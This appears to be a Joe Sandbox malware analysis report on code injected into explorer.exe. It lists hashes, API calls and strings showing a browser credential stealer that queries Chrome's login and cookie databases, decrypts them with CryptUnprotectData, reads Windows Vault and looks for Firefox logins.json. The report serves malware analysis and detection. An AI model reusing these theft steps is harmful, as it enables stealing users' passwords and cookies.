Opcode ID: f5820b8ea5cff059e2ca65d3897565f173a588097ec6688a9389ae85ed4efe19
Instruction ID: 1150fd9393647a021d9f28693d0b21df878c6cffa5e57c41f0e78fc481c450ee
Opcode Fuzzy Hash: f5820b8ea5cff059e2ca65d3897565f173a588097ec6688a9389ae85ed4efe19
Instruction Fuzzy Hash: 8071AA30308F499FDB69EB28C4587BAB7E2FB98311F54452ED49EC3245DF74A8428B81

Function 024932EC Relevance: 3.2, APIs: 2, Instructions: 157
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 02493332
ReadFile.KERNEL32 ref: 02493379

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: File$CreateRead
String ID:
API String ID: 3388366904-0
Opcode ID: badfb69e866206bf1aec5894b37ec2a863fdc2aed447bd11c369af276a4e727e
Instruction ID: fd81e775cc501d881f905adc39788e190a2a531b00f18688082bcf6f0342d500
Opcode Fuzzy Hash: badfb69e866206bf1aec5894b37ec2a863fdc2aed447bd11c369af276a4e727e
Instruction Fuzzy Hash: BA41A23071CF0D4FDB68EB6C985937ABAD2EBC9311F50026EA49BC3245DE64981347C1

Function 02494E00 Relevance: 3.1, APIs: 2, Instructions: 122
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.KERNEL32 ref: 02494E85
ObtainUserAgentString.URLMON ref: 02494EEE

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: AgentObtainQueryStringUserValue
String ID:
API String ID: 4107646653-0
Opcode ID: 14967515942ab5f3155c187ddb7612eac1b6b4b83ea38ca3825b558acf83a191
Instruction ID: 603efe40e92efe36c9f2f8fbbea3a292510d00103847d6d85e947c56fb0d1322
Opcode Fuzzy Hash: 14967515942ab5f3155c187ddb7612eac1b6b4b83ea38ca3825b558acf83a191
Instruction Fuzzy Hash: 84318831608A4D8FDF18EF68D8896EA77E6FB98310B10027FD85AD7545EF7098064B91

Function 02494A40 Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTokenInformation.KERNELBASE ref: 02494A94
GetTokenInformation.KERNELBASE ref: 02494ACB

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: c16b9007777c5fbaa3f53cde1809afd9184394dfa0c7ae21d454d4480f8148c1
Instruction ID: d63d56107e1d0035397da8d0950bd2d3fe9d0f64c5c23c5be9b0964ed180c559
Opcode Fuzzy Hash: c16b9007777c5fbaa3f53cde1809afd9184394dfa0c7ae21d454d4480f8148c1
Instruction Fuzzy Hash: 59213334608B088FCB55EB28D45866AB7F2FB99311B100A6EE49AC7254CB70D845DB41

Function 02493CD0 Relevance: 3.0, APIs: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32 ref: 02493CEC
SleepEx.KERNEL32 ref: 02493CF7

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: EnumSleepWindows
String ID:
API String ID: 498413330-0
Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
Instruction ID: 9c3a15409762cb6d09fed670cb0f1b7e8e8a8beda86e21655df383f0780660f2
Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
Instruction Fuzzy Hash: 80E04F30504A098FEF28AFA4C0DCBB13AA1EB18206F1401BBDC0EDD285CB764985C720

Function 02493F7C Relevance: 2.0, APIs: 1, Instructions: 455
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03da1ff889cf56ce5b15326bb5d87766f4294a11689bde974b35e737c0aadbcd
Instruction ID: 423de9c1e0e2f4227af6302274467304bafdac79fba3a1148885ef276c8cd19e
Opcode Fuzzy Hash: 03da1ff889cf56ce5b15326bb5d87766f4294a11689bde974b35e737c0aadbcd
Instruction Fuzzy Hash: 3BD16E30718B498FDF64EF68D4457AEBBE2FB98701F50452EE44AD3241DB74E8068B82

Function 02494578 Relevance: 1.6, APIs: 1, Instructions: 119processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32 ref: 0249465C

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: c6ea0675358742ce16f6cf21072778e4d3517b6488bd88ff55d4cd9cd9108430
Instruction ID: 295bd8dbdd66fe09d45b6671c89198a537c42a5ba2f09573f35d1b40703a6bd0
Opcode Fuzzy Hash: c6ea0675358742ce16f6cf21072778e4d3517b6488bd88ff55d4cd9cd9108430
Instruction Fuzzy Hash: 24318B30708F484FCB98EF69D08875AB7E2FB98311F504A6EA44EC3245DBB4D8458B81

Function 02494C90 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32 ref: 02494CFD

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 1d0cb5fe9283983f3568e12a9bb75b7ec9ed7c5609916c5b8e7118791da650f8
Instruction ID: 5554e77322385130ba7823b7815904103b13579e57d507e35e8d82d1951b779d
Opcode Fuzzy Hash: 1d0cb5fe9283983f3568e12a9bb75b7ec9ed7c5609916c5b8e7118791da650f8
Instruction Fuzzy Hash: AB315330618B4C8FDB64EF68D448BAA77E2FBA8311F50466E984ED7264DE30D9458B81

Function 02491980 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 024919D0: RtlCreateHeap.NTDLL ref: 02491AE7

SleepEx.KERNEL32(?,?,?,?,?,?,?,02491973), ref: 024919A0

Memory Dump Source

Source File: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, Offset: 02491000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2491000_explorer.jbxd

Yara matches

Similarity

API ID: CreateHeapSleep
String ID:
API String ID: 221814145-0
Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
Instruction ID: 33061fb596b47a362798086dfc61bdc85f96bc5c8a8fc9cee5d22764fbfaf237
Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
Instruction Fuzzy Hash: E2E0DF30718A0A0FDF98BB7A848433D28A2DBC8200F40057FA91EC6281D928C880C722

Analysis Process: wihaduvPID: 1556, Parent PID: 1040COMMON

Executed Functions

Function 01690B38 Relevance: .4, Instructions: 419COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82f62c227411d470cf7fc4343b5d1ab3019f26e6e6a1bfcf7a6ebd3d0ec822f2
Instruction ID: e592e3248c43000d91a3919136793c78b274063c58afe94bdc517a89d3a73359
Opcode Fuzzy Hash: 82f62c227411d470cf7fc4343b5d1ab3019f26e6e6a1bfcf7a6ebd3d0ec822f2
Instruction Fuzzy Hash: F421D331E012049FDB28AFB9D84859DBBB6FF88310B55453AE90297360DF7088858B90

Function 01690DF8 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb88300abded116151409b17e288f15f7cdee4f34011604b591c4dbb24ac0c70
Instruction ID: 34a60145ddce6a627a42d4b6237bc63c3822a5ee70483a2a26aeb6fbfd112e97
Opcode Fuzzy Hash: cb88300abded116151409b17e288f15f7cdee4f34011604b591c4dbb24ac0c70
Instruction Fuzzy Hash: A061C435B002148FDB24AFB9D85876DBBAAFFC8711F558429E906D7364DF749C828B80

Function 01691169 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f06b3da9fbda1f405dafbb5ff7a4d4b8195d52df9b7127d64613544b921b7748
Instruction ID: 696f132a7b0293231fc6a8f68e182c9766582d136237b7e9af227b775993e38e
Opcode Fuzzy Hash: f06b3da9fbda1f405dafbb5ff7a4d4b8195d52df9b7127d64613544b921b7748
Instruction Fuzzy Hash: F23119753812148FCB59AB78C45891D7BE2BF8A71636204B9E506CF371DB35DC82CB80

Function 01690E4A Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8609cc05a24ecc8661923be5a03c2016da4cadaf7f3bca8c178b5935e52cf8dc
Instruction ID: b8095118bf255e5c8f695e176287b52a534c339a4223204bf7e25b60de95b861
Opcode Fuzzy Hash: 8609cc05a24ecc8661923be5a03c2016da4cadaf7f3bca8c178b5935e52cf8dc
Instruction Fuzzy Hash: 64012C34B012148FDF286FB9981C66C7BA6FBC8321B554439E916C7365DFB58C818B91

Function 01691360 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f129647139c3dda376decafd002495320337a1ebb5ffb35622db4869c257910d
Instruction ID: c00c08c3b018e5d249760ef5edf4a5fedf4740e8c5a19a97c925eaa01bde849d
Opcode Fuzzy Hash: f129647139c3dda376decafd002495320337a1ebb5ffb35622db4869c257910d
Instruction Fuzzy Hash: DAF0A4716402119FCB24AF34F41C65D3BA5F788731B5E4060E40A8B364DFB81CC28785

Function 016912A1 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 671d1b34844d6749a68317330f991155e6d75521860456b964cfb50101687e6e
Instruction ID: e3bbb89d4b9231724181ddf9a3647889fec34ef364903d72b06f914961f09f4a
Opcode Fuzzy Hash: 671d1b34844d6749a68317330f991155e6d75521860456b964cfb50101687e6e
Instruction Fuzzy Hash: 3EF0E2306042548FC702DBB9F454A697BF4FB8E210B4082AAD44ACB372CBB49C818F41

Function 016912B0 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40778640159993c24d4a5bd2da15f7fb978601288cdbcaa17b400300b0627e0d
Instruction ID: 40cfa4c62492d0bba14030b4e85007e67b8f7cc42bb004688e4912e389566823
Opcode Fuzzy Hash: 40778640159993c24d4a5bd2da15f7fb978601288cdbcaa17b400300b0627e0d
Instruction Fuzzy Hash: D7E09A306002188FC705EBAEF414B1977E9FB8D260B8081A8E519CB372DBB4ECC08F91

Function 01691268 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1955219863.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1690000_wihaduv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6347d2db5e837bdbc8226ae480d208222a5556f394934a93ff19db16658f228
Instruction ID: ba5c904f0aa3c015a40ff4489e03f27b37a8c550ce2a321faf77770acbccde52
Opcode Fuzzy Hash: f6347d2db5e837bdbc8226ae480d208222a5556f394934a93ff19db16658f228
Instruction Fuzzy Hash: D7D05E352483448FC722CF24E9189223BB8FB09315344008AED09CB372D6B5EC84CB12

Analysis Process: explorer.exePID: 2288, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	50.7%
Signature Coverage:	21.5%
Total number of Nodes:	785
Total number of Limit Nodes:	79

Executed Functions

Function 02973717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401
stringfileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02971B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
Part of subcall function 02971B6A: CloseHandle.KERNELBASE(00000000), ref: 02971B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 02973778
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02973782
DeleteFileW.KERNELBASE(00000000), ref: 02973789
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02973794
RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0297383B
RtlZeroMemory.NTDLL(?,00000040), ref: 02973870
lstrlen.KERNEL32(?,?,?,?,?), ref: 0297398B
lstrlen.KERNEL32(00000000), ref: 0297399A
wsprintfA.USER32 ref: 029739F1
lstrlen.KERNEL32(00000000,?,?), ref: 029739FD
lstrcat.KERNEL32(00000000,?), ref: 02973A21
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02973A49
lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02973B13
lstrlen.KERNEL32(00000000), ref: 02973B22
wsprintfA.USER32 ref: 02973B79
lstrlen.KERNEL32(00000000), ref: 02973B85
lstrcat.KERNEL32(00000000,?), ref: 02973BA9
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02973BDA
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02973C16

Strings

FALSE, xrefs: 029739BC, 02973B3C
0, xrefs: 02973828
TRUE, xrefs: 029739C9, 02973B51
SELECT host_key,path,is_secure,name,encrypted_value FROM cookies, xrefs: 029737C3
COOKIES, xrefs: 02973BE8, 02973BED, 02973BF6
%sTRUE%s%s%s%s%s, xrefs: 029739EB, 02973B73
v1, xrefs: 02973821

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
API String ID: 584740257-404540950
Opcode ID: a9481d6fd8efb8192b50eb3afc5d62e80f01da3d9f0a2b6ab6cfae69f33cbbb2
Instruction ID: 1b79dffd7c12d7182bf87acdd174893b312c5202b81669625622658e54462d20
Opcode Fuzzy Hash: a9481d6fd8efb8192b50eb3afc5d62e80f01da3d9f0a2b6ab6cfae69f33cbbb2
Instruction Fuzzy Hash: B1E18771608341AFD725EF25C890A3FBBEEAFC9748F14486CF88996290DB35C805DB56

Function 02972198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(?,00000114), ref: 029721AF
GetVersionExW.KERNEL32(?), ref: 029721BE
LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 029721E8
GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0297220A
GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 02972214
GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 02972220
GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0297222A
GetProcAddress.KERNEL32(00000000,VaultFree), ref: 02972236
RtlCompareMemory.NTDLL(?,029D1110,00000010), ref: 029722E8
RtlCompareMemory.NTDLL(?,029D1110,00000010), ref: 0297236C

Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994

StrStrIW.SHLWAPI(?,Internet Explorer), ref: 029723FE
FreeLibrary.KERNELBASE(00000000), ref: 02972493

Strings

Internet Explorer, xrefs: 029723F8
vaultcli.dll, xrefs: 029721E3
VaultEnumerateItems, xrefs: 02972216
VaultGetItem, xrefs: 02972222
VaultCloseVault, xrefs: 0297220C
VaultFree, xrefs: 0297222C
VaultOpenVault, xrefs: 02972204

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2583887280-2831467701
Opcode ID: 5563ea47170f22c00c142011318eb1f8bd3c2d1c6d3a7f9fb6e9718eb66d95d2
Instruction ID: 10eb15621ec14923be44fbf510f2e429b9c76cfe9a4e78c9146b99e832413c4d
Opcode Fuzzy Hash: 5563ea47170f22c00c142011318eb1f8bd3c2d1c6d3a7f9fb6e9718eb66d95d2
Instruction Fuzzy Hash: 46916C71A183059FE718DF65C884A2FBBEABFC8748F10482DF98997251EB71D901CB52

Function 02973098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248
fileencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02971B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
Part of subcall function 02971B6A: CloseHandle.KERNELBASE(00000000), ref: 02971B8F

GetTempPathW.KERNEL32(00000104,00000000), ref: 029730F9
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02973103
DeleteFileW.KERNELBASE(00000000), ref: 0297310A
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02973115
RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 029731A4
RtlZeroMemory.NTDLL(?,00000040), ref: 029731D7
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 029732DF
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0297339C

Strings

v1, xrefs: 0297318A
SELECT origin_url,username_value,password_value FROM logins, xrefs: 02973136
@, xrefs: 029731F1
0, xrefs: 02973191

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
API String ID: 2757140130-4052020286
Opcode ID: 4949c938a602fb8851b51f78db788e2b2f3383175568637128f7d6384e8b5ed7
Instruction ID: eb8c67fa8b62c5e6ce9307eb4926b2583c563c1aae84a3f20eb4eb0710036b77
Opcode Fuzzy Hash: 4949c938a602fb8851b51f78db788e2b2f3383175568637128f7d6384e8b5ed7
Instruction Fuzzy Hash: 2A91A771608381AFD720DF25C884A3FBBEEAFC5748F44492CF98996290DB35D804DB66

Function 02973ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02971000: GetProcessHeap.KERNEL32(00000008,?,029711C7,?,?,00000001,00000000,?), ref: 02971003
Part of subcall function 02971000: RtlAllocateHeap.NTDLL(00000000), ref: 0297100A

PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 02973F0A
FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02973F16
lstrcmpiW.KERNEL32(?,029C62CC), ref: 02973F38
lstrcmpiW.KERNEL32(?,029C62D0), ref: 02973F4C
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02973F69
lstrcmpiW.KERNEL32(?,Local State), ref: 02973F7E
PathCombineW.SHLWAPI(00000000,00000000,?), ref: 02973F9B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02973FB5
FindClose.KERNELBASE(00000000), ref: 02973FC4

Strings

Local State, xrefs: 02973F78
*.*, xrefs: 02973F01

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
String ID: *.*$Local State
API String ID: 3923353463-3324723383
Opcode ID: f4720f3976d5fa15eaf3d276dcf950110430a04049e4cf56c2892d52f5fb9480
Instruction ID: 56e32ec5a5597cc595f09482f77fd8c9ec8de72e39bbae09b5667dfd8ac850ff
Opcode Fuzzy Hash: f4720f3976d5fa15eaf3d276dcf950110430a04049e4cf56c2892d52f5fb9480
Instruction Fuzzy Hash: AE21C2306443446BF714BA318C48A3F77BDEFC6396F24092DF816D2281DB7894189B66

Function 02972B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994

FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 02972B3D
lstrcmpiW.KERNEL32(?,029C62CC), ref: 02972B63
lstrcmpiW.KERNEL32(?,029C62D0), ref: 02972B7B

Part of subcall function 029719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02972CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 029719C4

StrStrIW.SHLWAPI(00000000,logins.json), ref: 02972BE7
StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 02972C16
FindNextFileW.KERNELBASE(00000000,00000010), ref: 02972C43
FindClose.KERNELBASE(00000000), ref: 02972C52

Strings

\*.*, xrefs: 02972B15
cookies.sqlite, xrefs: 02972C10
logins.json, xrefs: 02972BE1

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
String ID: \*.*$cookies.sqlite$logins.json
API String ID: 1108783765-3717368146
Opcode ID: 15c8eaf67fc6ef0f08443d4916eabd69aac7333adfe9eb130edf8b9b53dff193
Instruction ID: 8e22cb404720f34811b953cb7d9b5d45bd73f9227c2e74316d6704279f278604
Opcode Fuzzy Hash: 15c8eaf67fc6ef0f08443d4916eabd69aac7333adfe9eb130edf8b9b53dff193
Instruction Fuzzy Hash: 4031B330B183414BEA14AB719898A3F77DFAFC5704F24492CEC4AD3281EB79C9069A52

Function 02971D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 029719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,02972CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 029719C4

FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 02971DA9
lstrcmpiW.KERNEL32(?,029C62CC), ref: 02971DCF
lstrcmpiW.KERNEL32(?,029C62D0), ref: 02971DE7
lstrcmpiW.KERNEL32(?,?), ref: 02971E62

Part of subcall function 02971CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,02972C27), ref: 02971D02
Part of subcall function 02971CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 02971D0D

FindNextFileW.KERNELBASE(00000000,00000010), ref: 02971E94
FindClose.KERNELBASE(00000000), ref: 02971EA3

Part of subcall function 02971953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
Part of subcall function 02971953: lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
Part of subcall function 02971953: lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994

Strings

\*.*, xrefs: 02971D79
*.*, xrefs: 02971D8B

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
String ID: *.*$\*.*
API String ID: 232625764-1692270452
Opcode ID: 6324815252a1c20e4e4a739a240d1782253017b006b4c458ec463d9b82d4f2a2
Instruction ID: cb7a7f2869dfb42f852a0a946a6db9c029b20b649bf712b211b055e8ffb48672
Opcode Fuzzy Hash: 6324815252a1c20e4e4a739a240d1782253017b006b4c458ec463d9b82d4f2a2
Instruction Fuzzy Hash: C131A1307083419BDB20EB349888A7F77EEAFC5240F144A2DE94ED2244EB75C84ACB52

Function 02973E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02971B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02972893,00000000,00000000,00000000,?), ref: 02971B82
Part of subcall function 02971B6A: CloseHandle.KERNELBASE(00000000), ref: 02971B8F

Part of subcall function 02971C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02973E1E,00000000,?,02973FA8), ref: 02971C46
Part of subcall function 02971C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,02973FA8), ref: 02971C56
Part of subcall function 02971C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02973FA8), ref: 02971C76
Part of subcall function 02971C31: CloseHandle.KERNELBASE(00000000,?,02973FA8), ref: 02971C91

Part of subcall function 02972FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02973E30,00000000,00000000,?,02973FA8), ref: 02972FC1
Part of subcall function 02972FB1: lstrlen.KERNEL32("encrypted_key":",?,02973FA8), ref: 02972FCE
Part of subcall function 02972FB1: StrStrIA.SHLWAPI("encrypted_key":",029C692C,?,02973FA8), ref: 02972FDD

